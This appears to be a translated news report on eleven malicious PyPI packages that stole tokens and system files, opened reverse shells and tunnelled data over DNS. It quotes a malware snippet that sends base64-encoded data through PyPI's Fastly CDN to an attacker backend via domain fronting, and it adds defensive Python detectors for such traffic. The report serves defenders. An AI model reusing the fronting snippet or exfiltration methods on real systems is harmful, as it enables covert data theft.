Malicious libraries discovered in the PyPI catalog that use the PyPI CDN to hide their communication channel.

Eleven packages containing malicious code were discovered in the PyPI (Python Package Index) directory. Before the problem was identified, the packages had been downloaded a total of about 38 thousand times. The discovered malicious packages stand out for the sophisticated methods they use to hide the communication channels to the attackers' servers.

  • importantpackage (6305 downloads), important-package (12897) - established a connection to an external server under the guise of connecting to pypi.python.org in order to give shell access to the system (reverse shell), and used the trevorc2 program to hide the communication channel.
  • pptest (10001), ipboards (946) - used DNS as a communication channel to transmit information about the system (in the first package: host name, working directory, internal and external IP; in the second: user name and host name).
  • owlmoon (3285), DiscordSafety (557), yiffparty (1859) - located the Discord service token on the system and sent it to an external host.
  • trrfab (287) - sent an identifier, the host name and the contents of /etc/passwd, /etc/hosts and /home to an external host.
  • 10Cent10 (490) - established a reverse shell connection to an external host.
  • yandex-yt (4183) - displayed a message saying the system had been compromised and redirected to a page with additional information about further actions, published via nda.ya.ru (api.ya.cc).

Of particular note is the method used to reach external hosts in the importantpackage and important-package packages, which abused the Fastly content delivery network that serves the PyPI directory to hide their activity. The requests were in fact sent to the pypi.python.org server (including the python.org name in the SNI of the HTTPS request), but the HTTP "Host" header carried the name of a server controlled by the attackers (sec.forward.io.global.prod.fastly.net). The content delivery network then forwarded the request to the attackers' server, while the data travelled inside the TLS connection established for pypi.python.org.

The PyPI infrastructure is served by the Fastly content delivery network, which uses the Varnish transparent proxy to cache typical requests, and which also terminates TLS at the CDN level rather than on the origin servers, passing HTTPS requests through the proxy. Regardless of the intended host, requests go to the proxy, which selects the required backend from the HTTP "Host" header, and the host names are bound to CDN load balancer IP addresses shared by all Fastly customers.

The attackers' server is likewise registered with the Fastly CDN, which offers free plans to anyone and allows anonymous registration. Notably, the same scheme of sending requests to the victim is also used when setting up the "reverse shell", but in that case it is initiated from the attacker's side. From the outside, the interaction with the attackers' server looks like a legitimate session with the PyPI directory, encrypted with the PyPI TLS certificate. A similar technique, known as "domain fronting", was previously widely used to hide the host name when bypassing blocking: some CDN networks allow an HTTPS connection to present a decoy host in SNI while passing the name of the actually requested host in the HTTP Host header inside the TLS session.


To hide the malicious activity, the TrevorC2 package was also used to make the interaction with the server resemble ordinary web browsing; for example, malicious requests were sent under the guise of downloading the image "https://pypi.python.org/images?guid=", with the information encoded in the guid parameter:

    url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
    r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
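The fronting described above leaves a concrete trace at any egress point that can see both the TLS SNI and the HTTP Host header (a TLS-inspecting proxy, or Zeek's ssl.log joined with http.log): the two names disagree, and the TrevorC2 style request additionally carries a large base64 blob in a query parameter. The following detector is an added example, not code from the article or from the analysed packages; it assumes a constructed key=value log format (fields sni=, host=, path=) and the sample lines are made up to match the pattern the text describes. The hostnames psec.forward.io.global.prod.fastly.net and the PyPI names come from the article; the allow-list of PyPI names is an assumption you should replace with your own inventory.

```python
"""Flag domain-fronting style requests in an egress proxy log (added example)."""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log: one request per line, space-separated key=value fields.
# Line ts=2 mimics the article's pattern: SNI says pypi.python.org, the HTTP Host
# header names a different Fastly backend, and a base64 blob rides in ?guid=.
SAMPLE_LOG = """\
ts=1 src=10.0.0.5 sni=pypi.python.org host=pypi.python.org path=/simple/requests/
ts=2 src=10.0.0.5 sni=pypi.python.org host=psec.forward.io.global.prod.fastly.net path=/images?guid=aG9zdG5hbWU9YnVpbGQtMDE7dXNlcj1jaQ==
ts=3 src=10.0.0.7 sni=files.pythonhosted.org host=files.pythonhosted.org path=/packages/ab/cd/requests-2.0.tar.gz
ts=4 src=10.0.0.5 sni=pypi.python.org host=pypi.org path=/simple/
"""

# Assumed set of legitimate PyPI names behind the Fastly front; replace with your own.
PYPI_NAMES = frozenset({"pypi.python.org", "pypi.org", "files.pythonhosted.org"})

FIELD_RE = re.compile(r"(\w+)=(\S+)")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def parse_line(line):
    """Turn 'k=v k=v ...' into a dict (the path value keeps its own ?k=v part)."""
    return dict(FIELD_RE.findall(line))


def looks_base64(value):
    """True for a standard-alphabet base64 string of 16+ chars that actually decodes."""
    if not B64_RE.match(value) or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
        return True
    except binascii.Error:
        return False


def classify(record):
    """Return the reasons a request deserves attention; an empty list means clean."""
    reasons = []
    sni, host = record.get("sni", ""), record.get("host", "")
    if sni != host:
        reasons.append(f"SNI/Host mismatch: sni={sni} host={host}")
        # The exact shape from the article: TLS is negotiated for a PyPI name,
        # but the Host header steers the CDN to a backend that is not PyPI.
        if sni in PYPI_NAMES and host not in PYPI_NAMES:
            reasons.append("TLS name is PyPI but Host header is not a PyPI name")
    query = parse_qs(urlsplit(record.get("path", "")).query)
    for name, values in query.items():
        for value in values:
            if looks_base64(value):
                reasons.append(f"base64-looking blob in query parameter {name!r} ({len(value)} chars)")
    return reasons


def scan(log_text):
    """Map each flagged request's ts field to its list of reasons."""
    findings = {}
    for line in log_text.splitlines():
        record = parse_line(line)
        reasons = classify(record)
        if reasons:
            findings[record["ts"]] = reasons
    return findings


if __name__ == "__main__":
    for ts, reasons in scan(SAMPLE_LOG).items():
        print(f"ts={ts}:")
        for reason in reasons:
            print(f"  - {reason}")
```

On the sample, ts=2 is reported with all three reasons, while ts=4 (pypi.python.org in SNI, pypi.org in Host) is reported only as a plain mismatch, which is worth keeping as a low-severity signal: legitimate CDN customers do occasionally differ in SNI and Host, so the high-confidence rule is the combination of a PyPI SNI with a non-PyPI Host.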

The pptest and ipboards packages used a different way of hiding their network activity, based on encoding the harvested information in queries to a DNS server. The malware transmits information by issuing DNS requests such as "nu4timjagq4fimbuhe.example.com", in which the data destined for the control server is encoded in base64 form as the subdomain name. The attacker receives these messages by controlling the DNS server for the example.com domain.
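Exfiltration over DNS like this is visible to the defender's own resolver: the leftmost label is long and has the high character entropy of encoded data, and one client keeps asking for many distinct, never-repeated subdomains under the same apex. The scanner below is an added example, not code from the article or the packages; it assumes a constructed resolver log of "client qname" lines, the sample queries are made up (only the nu4timjagq4fimbuhe.example.com name is from the article), and it takes the last two labels as the zone apex, which is a simplification that a production version would replace with a public-suffix list.

```python
"""Spot DNS-tunnelling style queries in a resolver log (added example)."""
import math
from collections import defaultdict

# Constructed sample resolver log: "client-ip queried-name", one query per line.
SAMPLE_QUERIES = """\
10.0.0.5 nu4timjagq4fimbuhe.example.com
10.0.0.5 mvsxg5dbnfxgkzldmfzsa.example.com
10.0.0.5 ofzxkz3sn5xgg5dpojzsgytfon2a.example.com
10.0.0.7 www.example.com
10.0.0.7 pypi.org
10.0.0.9 mail.example.com
10.0.0.5 files.pythonhosted.org
"""


def shannon_entropy(text):
    """Bits of entropy per character; encoded blobs score far above hostnames."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname, apex_labels=2):
    """Split 'sub.labels.apex.tld' into (subdomain, apex). Assumes a 2-label apex."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= apex_labels:
        return "", ".".join(labels)
    return ".".join(labels[:-apex_labels]), ".".join(labels[-apex_labels:])


def suspicious_subdomain(sub, min_len=16, min_entropy=3.0):
    """Long, high-entropy leftmost label. DNS names are case-insensitive, so the
    encoding often arrives lower-cased or as base32; entropy and length catch
    both without relying on a clean base64 decode."""
    if not sub:
        return False
    first = sub.split(".")[0]
    return len(first) >= min_len and shannon_entropy(first) >= min_entropy


def scan_dns(log_text, threshold=2):
    """Group suspicious subdomains by (client, apex); report groups at or above
    threshold distinct names, since one odd label is noise but a stream of
    unique ones from a single client is the exfiltration pattern."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        client, qname = line.split()
        sub, apex = split_name(qname)
        if suspicious_subdomain(sub):
            seen[(client, apex)].add(sub)
    return {key: sorted(subs) for key, subs in seen.items() if len(subs) >= threshold}


if __name__ == "__main__":
    for (client, apex), subs in scan_dns(SAMPLE_QUERIES).items():
        print(f"{client} -> {apex}: {len(subs)} encoded-looking subdomains")
        for sub in subs:
            print(f"  {sub}")
```

Tune min_len and the threshold against your own baseline: CDN and anti-spam infrastructure legitimately produce long hashed labels, so the per-client count of distinct names under one apex is the discriminator that matters, not a single label in isolation.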

Source: opennet.ru
